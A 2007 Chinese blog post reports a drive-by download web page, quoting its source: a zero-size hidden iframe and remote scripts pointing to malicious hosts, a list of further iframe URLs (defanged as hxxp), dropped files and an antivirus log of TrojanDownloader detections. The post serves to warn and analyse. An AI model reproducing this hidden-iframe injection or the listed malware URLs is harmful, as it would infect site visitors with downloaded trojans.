20070614 彪悍的网页 木马 TrojanDownloader

20070614 彪悍的网页 木马 TrojanDownloader
http://www.yippeesoft.com

这个病毒网页很猛
hxxp://www.1717kan.cn/index_1077.asp

有哥们开大蜘蛛进入，结果系统中毒，惨不忍睹
病毒若干
用IE，弹出所有窗口就会发现~~
驱逐舰也防不住的样子

FIREFOX看到的源码
<script language="javascript" src="hxxp://count23.51yes.com/click.aspx?id=233356760&logo=1"></script>

<iframe src=\’hxxp://59.34.197.239/in.asp?newwebname=1077\’ width=\’0\’ height=\’0\’ frameborder=\’0\’></iframe>
<script language="javascript" src="hxxp://59.34.197.239/in.js"></script>

<DIV style="DISPLAY: none"><script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/579660.js"></script></DIV>

<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/552570.js"></script>

lynx看到的源码
 统计写入完毕!

   IFRAME:hxxp://ip1.adanywhere.cn/iframey1.asp

   IFRAME:hxxp://go1.ipcenter.cn/qqxqjinan1.asp

   IFRAME:hxxp://www.f1ash8.net/aaqad.asp

   IFRAME:hxxp://go.ipcenter.cn/20061.asp

   IFRAME:hxxp://www1.winopen.cn/google12.asp

   IFRAME:hxxp://www1.winopen.cn/forum5.asp

   IFRAME:hxxp://ip.adanywhere.cn/my5000.asp

   IFRAME:hxxp://www1.winopen.cn/estock8.asp

   IFRAME:hxxp://www1.winopen.cn/xllcw.asp

   IFRAME:hxxp://ip.8dunet.com/heiwangla.asp

   IFRAME:hxxp://www1.winopen.cn/forum6.asp

   IFRAME:hxxp://www1.winopen.cn/km163.asp

   IFRAME:hxxp://59.34.197.239/bind_50077.htm

   太猛了
用SNDNOX+NOD32
不停的报病毒~

生成：
68,057 16.exe
      0 nsp494.tmp
  58,087 nsp495.tmp
  20,480 bind_50219.e
  22,016 setup.exe
        RarSFX0
      0 nsk496.tmp
  41,856 ~DFBCD9.tmp
    191 lupdate.ini
      96 www499.tmp
      96 www49A.tmp
  16,384 Perflib_Perf
      0 nsi49B.tmp
  58,087 nsi49C.tmp
      0 nsq49D.tmp

      sandbox也没有扛注
有个16.EXE在运行
時間 模件 物件 名稱 病毒 動作 使用者名稱 資訊
2007-3-6 11:40:46 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\XQTW75E1\\Wenxue[1].htm JS/TrojanDownloader.IstBar.G trojan 已隔離 – deleted SF\\shengfang 程式建立一個新檔案時發生事件 N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe. 檔案已被移到隔離區。
2007-3-6 11:40:42 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\XQTW75E1\\Wenxue[1].htm JS/TrojanDownloader.IstBar.G trojan  SF\\shengfang 嘗試存取檔案時發生事件。 N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe.
2007-3-6 11:40:41 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\XQTW75E1\\16111exe0[1].htm VBS/TrojanDownloader.Psyme.DB trojan 已隔離 – deleted SF\\shengfang 程式建立一個新檔案時發生事件 N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe. 檔案已被移到隔離區。
2007-3-6 11:40:41 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\050QCAMI\\510392322exe[1].htm VBS/TrojanDownloader.Psyme.DB trojan 已隔離 – deleted SF\\shengfang 程式建立一個新檔案時發生事件 N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe. 檔案已被移到隔離區。
2007-3-6 11:40:40 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\050QCAMI\\bind_50077[1].htm VBS/TrojanDownloader.Psyme.DB trojan 已隔離 – deleted SF\\shengfang 程式建立一個新檔案時發生事件 N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe. 檔案已被移到隔離區。
2007-3-6 11:40:39 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\050QCAMI\\in[1].js JS/TrojanDownloader.Agent.CN trojan  SF\\shengfang 此應用程序在修改文件時發生事件： N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe. 檔案已被移到隔離區。
2007-3-6 11:40:37 AMON 檔案 M:\\TEMP\\sanboxie\\Sandbox\\sf\\Device\\HarddiskVolume16\\TEMP\\Temporary Internet Files\\Content.IE5\\050QCAMI\\in[1].htm VBS/TrojanDownloader.Psyme.DB trojan deleted SF\\shengfang 嘗試存取檔案時發生事件。 N:\\Green\\internet\\GreenBrowserGB\\GreenBrowser.exe.

历史博文

• c# sdk2000 - 2009
• 20080213 数据库 表 数据 比较 - 2008
• 0523 mpx220 smartphone 桌面主题 - 2006
• VSTS 1115 郁闷 女排输球 安装VSTF失败 - 2005
• PERL 时间 日期 LOCALTIME TIME HTTP::DATE - 2005